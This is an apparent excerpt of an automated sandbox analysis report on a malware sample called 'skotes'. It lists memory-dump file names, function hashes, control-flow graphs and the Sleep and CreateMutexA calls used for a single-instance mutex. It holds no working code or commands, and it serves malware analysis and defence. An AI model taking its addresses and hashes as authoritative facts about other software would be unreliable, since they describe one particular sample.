                                                                                                                                                                                                        • Source File: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897231334.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897285467.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897469676.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897531196.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897605032.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897963140.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898007853.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898064981.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898115829.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898160888.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898257929.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898307061.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898351313.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898396305.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898441590.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898485575.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898530916.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898572212.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898614687.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898658203.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898713220.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898762071.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898796658.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898834319.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898872512.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898911110.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898958632.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899004161.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899049281.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899158645.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899205310.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899242154.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899281797.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899324488.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899367116.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899409985.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899456104.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899506082.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899558796.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899604806.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899647227.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899692997.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899733316.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899733316.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899873452.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899915305.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899955435.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900002889.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900050472.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900094567.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900135220.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900186248.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900228243.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_9c0000_skotes.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: 1b4e911a46b2dbbb08385f35bf8b926d4ded7a2b9eec9e8217da7b70a7a96c1b
                                                                                                                                                                                                        • Instruction ID: c34d0296929520399d3527981fac5f923bf9452caac5cfbc80298f2b15fca0dd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b4e911a46b2dbbb08385f35bf8b926d4ded7a2b9eec9e8217da7b70a7a96c1b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE312831B402059BEB08EB68DCCDFADBB66EBD6314F20821DE454A73D5C77989808752

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 22 9c9f44-9c9f64 26 9c9f66-9c9f72 22->26 27 9c9f92-9c9fae 22->27 30 9c9f88-9c9f8f call 9dd663 26->30 31 9c9f74-9c9f82 26->31 28 9c9fdc-9c9ffb 27->28 29 9c9fb0-9c9fbc 27->29 34 9c9ffd-9ca009 28->34 35 9ca029-9ca916 call 9d80c0 28->35 32 9c9fbe-9c9fcc 29->32 33 9c9fd2-9c9fd9 call 9dd663 29->33 30->27 31->30 36 9ca92b 31->36 32->33 32->36 33->28 39 9ca01f-9ca026 call 9dd663 34->39 40 9ca00b-9ca019 34->40 42 9ca953-9ca994 Sleep CreateMutexA 36->42 43 9ca92b call 9f6c6a 36->43 39->35 40->36 40->39 51 9ca996-9ca998 42->51 52 9ca9a7-9ca9a8 42->52 43->42 51->52 54 9ca99a-9ca9a5 51->54 54->52
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 009CA963
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897231334.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897285467.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897469676.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897531196.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897605032.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897963140.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898007853.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898064981.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898115829.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898160888.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898257929.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898307061.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898351313.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898396305.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898441590.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898485575.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898530916.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898572212.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898614687.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898658203.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898713220.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898762071.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898796658.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898834319.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898872512.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898911110.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898958632.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899004161.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899049281.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899158645.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899205310.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899242154.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899281797.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899324488.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899367116.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899409985.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899456104.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899506082.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899558796.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899604806.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899647227.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899692997.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899733316.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899733316.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899873452.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899915305.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899955435.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900002889.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900050472.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900094567.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900135220.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900186248.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900228243.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_9c0000_skotes.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: 72517fc9f6ba64bfb0af11e952d6cabc952dc591203e3d0a05287f1f4400b0f3
                                                                                                                                                                                                        • Instruction ID: b2c40490a944987397b39baecce36dff586fa88ed79a0e58b0ccc3917e620fb8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 72517fc9f6ba64bfb0af11e952d6cabc952dc591203e3d0a05287f1f4400b0f3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2312831B002099BEB18DB68D88DFADBB66EBC6314F20861DE414EB3D5C73989808753

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 56 9ca079-9ca099 60 9ca09b-9ca0a7 56->60 61 9ca0c7-9ca0e3 56->61 62 9ca0bd-9ca0c4 call 9dd663 60->62 63 9ca0a9-9ca0b7 60->63 64 9ca0e5-9ca0f1 61->64 65 9ca111-9ca130 61->65 62->61 63->62 68 9ca930 63->68 70 9ca107-9ca10e call 9dd663 64->70 71 9ca0f3-9ca101 64->71 66 9ca15e-9ca916 call 9d80c0 65->66 67 9ca132-9ca13e 65->67 73 9ca154-9ca15b call 9dd663 67->73 74 9ca140-9ca14e 67->74 77 9ca953-9ca994 Sleep CreateMutexA 68->77 78 9ca930 call 9f6c6a 68->78 70->65 71->68 71->70 73->66 74->68 74->73 85 9ca996-9ca998 77->85 86 9ca9a7-9ca9a8 77->86 78->77 85->86 88 9ca99a-9ca9a5 85->88 88->86
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 009CA963
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897231334.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897285467.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897469676.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897531196.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897605032.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897963140.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898007853.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898064981.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898115829.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898160888.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898257929.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898307061.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898351313.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898396305.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898441590.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898485575.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898530916.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898572212.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898614687.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898658203.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898713220.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898762071.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898796658.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898834319.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898872512.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898911110.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898958632.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899004161.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899049281.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899158645.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899205310.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899242154.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899281797.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899324488.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899367116.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899409985.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899456104.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899506082.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899558796.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899604806.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899647227.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899692997.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899733316.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899733316.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899873452.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899915305.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899955435.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900002889.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900050472.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900094567.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900135220.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900186248.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900228243.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_9c0000_skotes.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: aea1960034fe0b3f475ba1eff9c9d459032634be2bdc9c1e5621e40bfd90163b
                                                                                                                                                                                                        • Instruction ID: d8da58d61ddd3d1b081ab4099d01c63e47251f612e92d394f2ef9cb386456829
                                                                                                                                                                                                        • Opcode Fuzzy Hash: aea1960034fe0b3f475ba1eff9c9d459032634be2bdc9c1e5621e40bfd90163b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90316831B052099BEB08DB78CCC9FADBB66EBC6318F24821CE014973D1C73A99808757

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 90 9ca1ae-9ca1ce 94 9ca1fc-9ca218 90->94 95 9ca1d0-9ca1dc 90->95 98 9ca21a-9ca226 94->98 99 9ca246-9ca265 94->99 96 9ca1de-9ca1ec 95->96 97 9ca1f2-9ca1f9 call 9dd663 95->97 96->97 102 9ca935 96->102 97->94 104 9ca23c-9ca243 call 9dd663 98->104 105 9ca228-9ca236 98->105 100 9ca267-9ca273 99->100 101 9ca293-9ca916 call 9d80c0 99->101 107 9ca289-9ca290 call 9dd663 100->107 108 9ca275-9ca283 100->108 110 9ca953-9ca994 Sleep CreateMutexA 102->110 111 9ca935 call 9f6c6a 102->111 104->99 105->102 105->104 107->101 108->102 108->107 119 9ca996-9ca998 110->119 120 9ca9a7-9ca9a8 110->120 111->110 119->120 122 9ca99a-9ca9a5 119->122 122->120
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 009CA963
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897231334.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897285467.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897469676.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897531196.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897605032.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897963140.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898007853.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898064981.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
